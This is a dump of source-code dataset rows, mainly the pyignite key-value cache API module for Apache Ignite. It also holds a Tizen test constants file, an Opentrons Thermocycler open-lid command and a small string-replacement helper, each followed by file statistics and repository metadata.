renameTop = contextMenu.addAction("Change name")
disconnectTop = contextMenu.addAction("Disconnect")
if self.getConnectionCount() == 0:
disconnectTop.setEnabled(False)
removeTop = contextMenu.addAction("Remove")
action = contextMenu.exec_(event.screenPos())
if action is not None:
if action == removeTop:
self._nodeEditor.tryToRemoveTopBlob(self._nodeItem.getLayerID(), self._index)
elif action == renameTop:
self._nodeEditor.tryToRenameTopBlob(self)
elif action == disconnectTop:
self._nodeEditor.disconnectTopBlob(self._nodeItem.getLayerID(), self._index)
| 44.21875 | 118 | 0.673852 | 2,717 | 0.960071 | 0 | 0 | 0 | 0 | 0 | 0 | 917 | 0.324028 |
6a0e0bcfcfbc438530da36eb95d62a35b14a3931 | 33,998 | py | Python | modules/platforms/python/pyignite/api/key_value.py | DirectXceriD/gridgain | 093e512a9147e266f83f6fe1cf088c0b037b501c | [
"Apache-2.0",
"CC0-1.0"
] | 1 | 2019-03-11T08:52:37.000Z | 2019-03-11T08:52:37.000Z | modules/platforms/python/pyignite/api/key_value.py | DirectXceriD/gridgain | 093e512a9147e266f83f6fe1cf088c0b037b501c | [
"Apache-2.0",
"CC0-1.0"
] | null | null | null | modules/platforms/python/pyignite/api/key_value.py | DirectXceriD/gridgain | 093e512a9147e266f83f6fe1cf088c0b037b501c | [
"Apache-2.0",
"CC0-1.0"
] | null | null | null | # GridGain Community Edition Licensing
# Copyright 2019 GridGain Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License") modified with Commons Clause
# Restriction; you may not use this file except in compliance with the License. You may obtain a
# copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the
# License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
#
# Commons Clause Restriction
#
# The Software is provided to you by the Licensor under the License, as defined below, subject to
# the following condition.
#
# Without limiting other conditions in the License, the grant of rights under the License will not
# include, and the License does not grant to you, the right to Sell the Software.
# For purposes of the foregoing, “Sell” means practicing any or all of the rights granted to you
# under the License to provide to third parties, for a fee or other consideration (including without
# limitation fees for hosting or consulting/ support services related to the Software), a product or
# service whose value derives, entirely or substantially, from the functionality of the Software.
# Any license notice or attribution required by the License must also include this Commons Clause
# License Condition notice.
#
# For purposes of the clause above, the “Licensor” is Copyright 2019 GridGain Systems, Inc.,
# the “License” is the Apache License, Version 2.0, and the Software is the GridGain Community
# Edition software provided with this notice.
from typing import Iterable, Union
from pyignite.queries.op_codes import *
from pyignite.datatypes import (
Map, Bool, Byte, Int, Long, AnyDataArray, AnyDataObject,
)
from pyignite.datatypes.key_value import PeekModes
from pyignite.queries import Query, Response
from pyignite.utils import cache_id
def cache_put(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache (overwriting existing value if any).
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status if a value
is written, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_PUT,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
return query_struct.perform(connection, {
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
})
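# Illustrative usage sketch (not part of the original module): assumes an established
# `conn` Connection and an existing cache named 'my_cache'.
#
#   result = cache_put(conn, 'my_cache', key=1, value='one')
#   assert result.status == 0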
def cache_get(
connection: 'Connection', cache: Union[str, int], key,
key_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Retrieves a value from cache by key.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a value
retrieved on success, non-zero status and an error description on failure.
"""
query_struct = Query(
OP_CACHE_GET,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status != 0:
return result
result.value = result.value['value']
return result
def cache_get_all(
connection: 'Connection', cache: Union[str, int], keys: Iterable,
binary=False, query_id=None,
) -> 'APIResult':
"""
Retrieves multiple key-value pairs from cache.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param keys: list of keys or tuples of (key, key_hint),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a dict, made of
retrieved key-value pairs, non-zero status and an error description
on failure.
"""
query_struct = Query(
OP_CACHE_GET_ALL,
[
('hash_code', Int),
('flag', Byte),
('keys', AnyDataArray()),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'keys': keys,
},
response_config=[
('data', Map),
],
)
if result.status == 0:
result.value = dict(result.value)['data']
return result
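# Illustrative usage sketch (same assumed `conn` and 'my_cache' as above):
#
#   result = cache_get_all(conn, 'my_cache', keys=[1, 2, 3])
#   if result.status == 0:
#       print(result.value)  # dict of the key/value pairs that were found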
def cache_put_all(
connection: 'Connection', cache: Union[str, int], pairs: dict,
binary=False, query_id=None,
) -> 'APIResult':
"""
Puts multiple key-value pairs to cache (overwriting existing associations
if any).
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param pairs: dictionary type parameters, contains key-value pairs to save.
Each key or value can be an item of representable Python type or a tuple
of (item, hint),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status if key-value pairs
are written, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_PUT_ALL,
[
('hash_code', Int),
('flag', Byte),
('data', Map),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'data': pairs,
},
)
def cache_contains_key(
connection: 'Connection', cache: Union[str, int], key,
key_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Returns a value indicating whether given key is present in cache.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a bool value
retrieved on success: `True` when key is present, `False` otherwise,
non-zero status and an error description on failure.
"""
query_struct = Query(
OP_CACHE_CONTAINS_KEY,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
response_config=[
('value', Bool),
],
)
if result.status == 0:
result.value = result.value['value']
return result
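# Illustrative usage sketch (same assumed `conn` and 'my_cache' as above):
#
#   result = cache_contains_key(conn, 'my_cache', key=1)
#   present = result.value if result.status == 0 else False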
def cache_contains_keys(
connection: 'Connection', cache: Union[str, int], keys: Iterable,
binary=False, query_id=None,
) -> 'APIResult':
"""
Returns a value indicating whether all given keys are present in cache.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param keys: a list of keys or (key, type hint) tuples,
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a bool value
retrieved on success: `True` when all keys are present, `False` otherwise,
non-zero status and an error description on failure.
"""
query_struct = Query(
OP_CACHE_CONTAINS_KEYS,
[
('hash_code', Int),
('flag', Byte),
('keys', AnyDataArray()),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'keys': keys,
},
response_config=[
('value', Bool),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_get_and_put(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache, and returns the previous value
    for that key, or null value if there was no such key.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and an old value
or None if a value is written, non-zero status and an error description
in case of error.
"""
query_struct = Query(
OP_CACHE_GET_AND_PUT,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_get_and_replace(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache, returning previous value
for that key, if and only if there is a value currently mapped
for that key.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and an old value
or None on success, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_GET_AND_REPLACE, [
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_get_and_remove(
connection: 'Connection', cache: Union[str, int], key,
key_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Removes the cache entry with specified key, returning the value.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and an old value
or None, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_GET_AND_REMOVE, [
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_put_if_absent(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache only if the key
does not already exist.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: (optional) pass True to keep the value in binary form. False
by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_PUT_IF_ABSENT,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
def cache_get_and_put_if_absent(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache only if the key does not
already exist.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: (optional) pass True to keep the value in binary form. False
by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and an old value
or None on success, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_GET_AND_PUT_IF_ABSENT,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_replace(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
    Puts a value with a given key to cache only if the key already exists.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a boolean
success code, or non-zero status and an error description if something
has gone wrong.
"""
query_struct = Query(
OP_CACHE_REPLACE,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
def cache_replace_if_equals(
connection: 'Connection', cache: Union[str, int], key, sample, value,
key_hint=None, sample_hint=None, value_hint=None,
binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache only if the key already exists
and value equals provided sample.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry,
:param sample: a sample to compare the stored value with,
:param value: new value for the given key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
    :param sample_hint: (optional) Ignite data type, for which
the given sample should be converted
:param value_hint: (optional) Ignite data type, for which the given value
should be converted,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status and a boolean
success code, or non-zero status and an error description if something
has gone wrong.
"""
query_struct = Query(
OP_CACHE_REPLACE_IF_EQUALS,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('sample', sample_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'sample': sample,
'value': value,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
def cache_clear(
connection: 'Connection', cache: Union[str, int], binary=False,
query_id=None,
) -> 'APIResult':
"""
Clears the cache without notifying listeners or cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_CLEAR,
[
('hash_code', Int),
('flag', Byte),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
},
)
def cache_clear_key(
connection: 'Connection', cache: Union[str, int], key,
key_hint: object=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Clears the cache key without notifying listeners or cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_CLEAR_KEY,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
)
def cache_clear_keys(
connection: 'Connection', cache: Union[str, int], keys: list,
binary=False, query_id=None,
) -> 'APIResult':
"""
Clears the cache keys without notifying listeners or cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param keys: list of keys or tuples of (key, key_hint),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_CLEAR_KEYS,
[
('hash_code', Int),
('flag', Byte),
('keys', AnyDataArray()),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'keys': keys,
},
)
def cache_remove_key(
connection: 'Connection', cache: Union[str, int], key,
key_hint: object=None, binary=False, query_id=None,
) -> 'APIResult':
"""
    Removes the cache entry with specified key, notifying listeners and cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status and a boolean
success code, or non-zero status and an error description if something
has gone wrong.
"""
query_struct = Query(
OP_CACHE_REMOVE_KEY,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
def cache_remove_if_equals(
connection: 'Connection', cache: Union[str, int], key, sample,
key_hint=None, sample_hint=None,
binary=False, query_id=None,
) -> 'APIResult':
"""
Removes an entry with a given key if provided value is equal to
actual value, notifying listeners and cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry,
:param sample: a sample to compare the stored value with,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
    :param sample_hint: (optional) Ignite data type, for which
the given sample should be converted
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status and a boolean
success code, or non-zero status and an error description if something
has gone wrong.
"""
query_struct = Query(
OP_CACHE_REMOVE_IF_EQUALS,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('sample', sample_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'sample': sample,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
def cache_remove_keys(
connection: 'Connection', cache: Union[str, int], keys: Iterable,
binary=False, query_id=None,
) -> 'APIResult':
"""
Removes entries with given keys, notifying listeners and cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param keys: list of keys or tuples of (key, key_hint),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_REMOVE_KEYS,
[
('hash_code', Int),
('flag', Byte),
('keys', AnyDataArray()),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'keys': keys,
},
)
def cache_remove_all(
connection: 'Connection', cache: Union[str, int], binary=False,
query_id=None,
) -> 'APIResult':
"""
Removes all entries from cache, notifying listeners and cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_REMOVE_ALL,
[
('hash_code', Int),
('flag', Byte),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
},
)
def cache_get_size(
connection: 'Connection', cache: Union[str, int], peek_modes=0,
binary=False, query_id=None,
) -> 'APIResult':
"""
Gets the number of entries in cache.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param peek_modes: (optional) limit count to near cache partition
(PeekModes.NEAR), primary cache (PeekModes.PRIMARY), or backup cache
(PeekModes.BACKUP). Defaults to all cache partitions (PeekModes.ALL),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a number of
cache entries on success, non-zero status and an error description
otherwise.
"""
if not isinstance(peek_modes, (list, tuple)):
if peek_modes == 0:
peek_modes = []
else:
peek_modes = [peek_modes]
query_struct = Query(
OP_CACHE_GET_SIZE,
[
('hash_code', Int),
('flag', Byte),
('peek_modes', PeekModes),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'peek_modes': peek_modes,
},
response_config=[
('count', Long),
],
)
if result.status == 0:
result.value = result.value['count']
return result
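# Illustrative usage sketch (same assumed `conn` and 'my_cache' as above):
#
#   result = cache_get_size(conn, 'my_cache', peek_modes=PeekModes.PRIMARY)
#   count = result.value if result.status == 0 else None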
| 33.561698 | 100 | 0.62789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 20,317 | 0.597383 |
6a0e57de9c3d93fdc79f1a9d3f94690a6652bf6e | 989 | py | Python | wrt/wrt-manifest-tizen-tests/const.py | linshen/crosswalk-test-suite | e206b2c35fc09e583f3202fc7fc8a656c8e2b5de | [
"BSD-3-Clause"
] | null | null | null | wrt/wrt-manifest-tizen-tests/const.py | linshen/crosswalk-test-suite | e206b2c35fc09e583f3202fc7fc8a656c8e2b5de | [
"BSD-3-Clause"
] | null | null | null | wrt/wrt-manifest-tizen-tests/const.py | linshen/crosswalk-test-suite | e206b2c35fc09e583f3202fc7fc8a656c8e2b5de | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
import sys, os
import itertools, shutil
path = os.path.abspath(__file__)
path = os.path.split(path)[0]
os.chdir(path)
print path
device_ssh_ip = ""
ssh_device = device_ssh_ip.split(",")
path_tcs = path + "/tcs"
path_result= path + "/result"
path_allpairs = path + "/allpairs"
path_resource = path + "/resource"
seed_file = path_allpairs + "/positive/input_seed.txt"
seed_negative = path_allpairs + "/negative"
seed_positive = path_allpairs + "/positive"
seed_file_na = seed_negative + "/input_seed_negative.txt"
selfcomb_file = path_allpairs + "/selfcomb.txt"
output_file = path_allpairs + "/output.txt"
output_file_ne = path_allpairs + "/output_negative.txt"
report_path = path + "/report"
report_file = report_path + "/wrt-manifest-tizen-tests.xml"
report_summary_file = report_path + "/summary.xml"
sh_path = path + "/script"
log_path = report_path + "/log_"
device_path = "/home/app/content/tct/"
run_times = 3
version="6.35.1.2"
name="wrt-manifest-tizen-tests"
| 31.903226 | 59 | 0.743175 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 318 | 0.321537 |
6a0e7a4577ac3f9f8b9fd994210704a26f91ee39 | 2,606 | py | Python | api/src/opentrons/protocol_engine/commands/thermocycler/open_lid.py | Opentrons/protocol_framework | ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f | [
"Apache-2.0"
] | null | null | null | api/src/opentrons/protocol_engine/commands/thermocycler/open_lid.py | Opentrons/protocol_framework | ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f | [
"Apache-2.0"
] | null | null | null | api/src/opentrons/protocol_engine/commands/thermocycler/open_lid.py | Opentrons/protocol_framework | ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f | [
"Apache-2.0"
] | null | null | null | """Command models to open a Thermocycler's lid."""
from __future__ import annotations
from typing import Optional, TYPE_CHECKING
from typing_extensions import Literal, Type
from pydantic import BaseModel, Field
from ..command import AbstractCommandImpl, BaseCommand, BaseCommandCreate
from opentrons.protocol_engine.types import MotorAxis
if TYPE_CHECKING:
from opentrons.protocol_engine.state import StateView
from opentrons.protocol_engine.execution import EquipmentHandler, MovementHandler
OpenLidCommandType = Literal["thermocycler/openLid"]
class OpenLidParams(BaseModel):
"""Input parameters to open a Thermocycler's lid."""
moduleId: str = Field(..., description="Unique ID of the Thermocycler.")
class OpenLidResult(BaseModel):
"""Result data from opening a Thermocycler's lid."""
class OpenLidImpl(AbstractCommandImpl[OpenLidParams, OpenLidResult]):
"""Execution implementation of a Thermocycler's open lid command."""
def __init__(
self,
state_view: StateView,
equipment: EquipmentHandler,
movement: MovementHandler,
**unused_dependencies: object,
) -> None:
self._state_view = state_view
self._equipment = equipment
self._movement = movement
async def execute(self, params: OpenLidParams) -> OpenLidResult:
"""Open a Thermocycler's lid."""
thermocycler_state = self._state_view.modules.get_thermocycler_module_substate(
params.moduleId
)
thermocycler_hardware = self._equipment.get_module_hardware_api(
thermocycler_state.module_id
)
# move the pipettes and gantry over the trash
# do not home plunger axes because pipettes may be holding liquid
await self._movement.home(
[
MotorAxis.X,
MotorAxis.Y,
MotorAxis.RIGHT_Z,
MotorAxis.LEFT_Z,
]
)
if thermocycler_hardware is not None:
await thermocycler_hardware.open()
return OpenLidResult()
class OpenLid(BaseCommand[OpenLidParams, OpenLidResult]):
"""A command to open a Thermocycler's lid."""
commandType: OpenLidCommandType = "thermocycler/openLid"
params: OpenLidParams
result: Optional[OpenLidResult]
_ImplementationCls: Type[OpenLidImpl] = OpenLidImpl
class OpenLidCreate(BaseCommandCreate[OpenLidParams]):
"""A request to open a Thermocycler's lid."""
commandType: OpenLidCommandType = "thermocycler/openLid"
params: OpenLidParams
_CommandCls: Type[OpenLid] = OpenLid
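# Illustrative request construction (the moduleId value is hypothetical):
#   OpenLidCreate(params=OpenLidParams(moduleId="example-thermocycler-id"))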
| 30.302326 | 87 | 0.699156 | 2,032 | 0.779739 | 0 | 0 | 0 | 0 | 810 | 0.310821 | 552 | 0.211819 |
6a0eabac2607fdcd5104aaa4361b75c94d229375 | 373 | py | Python | deep_utils/nlp/utils/utils.py | pooya-mohammadi/deep_utils | b589d8ab0a8d63f3d3b90c3bc0d4b1b648b8be37 | [
"MIT"
] | 36 | 2021-11-10T05:17:18.000Z | 2022-03-27T18:25:10.000Z | deep_utils/nlp/utils/utils.py | pooya-mohammadi/deep_utils | b589d8ab0a8d63f3d3b90c3bc0d4b1b648b8be37 | [
"MIT"
] | 1 | 2021-12-03T07:07:18.000Z | 2022-03-08T09:29:03.000Z | deep_utils/nlp/utils/utils.py | pooya-mohammadi/deep_utils | b589d8ab0a8d63f3d3b90c3bc0d4b1b648b8be37 | [
"MIT"
] | 4 | 2021-11-28T07:39:57.000Z | 2022-03-30T05:46:10.000Z | def multiple_replace(text: str, chars_to_mapping: dict):
"""
    Replace every occurrence of the keys of `chars_to_mapping` found in `text`
    with their mapped values.
    :param text: input string to process
    :param chars_to_mapping: dict mapping characters/substrings to their replacements
    :return: the string with all replacements applied
"""
import re
pattern = "|".join(map(re.escape, chars_to_mapping.keys()))
return re.sub(pattern, lambda m: chars_to_mapping[m.group()], str(text))
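# Illustrative example: multiple_replace("hello", {"l": "r"}) returns "herro".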
| 31.083333 | 84 | 0.678284 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 158 | 0.423592 |
6a0f2b7a58a3c8b7affaa9282ffcc01b705d987b | 14,182 | py | Python | tests/exe.py | toutpuissantged/clickbot-monster | b8ccefb5078104ea91d30b9147cc59f92c70ed57 | [
"MIT"
